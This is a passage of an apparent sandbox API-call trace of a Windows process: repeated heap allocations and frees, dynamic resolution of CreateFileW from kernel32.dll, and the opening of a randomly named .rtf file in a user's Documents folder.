hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0082.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0082.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0082.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0082.731] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0082.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0082.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0082.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0082.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0082.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0082.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0082.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0082.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0082.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4bf0 [0082.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0082.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0082.734] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0082.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0082.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0082.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0082.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0082.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.737] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0082.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3680 [0082.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43c3680, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0082.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.737] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0082.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0082.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0082.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0082.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0082.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0082.739] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\HUjUtG60c TddWcmy.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\hujutg60c tddwcmy.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0082.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0082.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0082.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0082.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0082.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0082.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0082.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0082.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0082.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0082.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0082.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 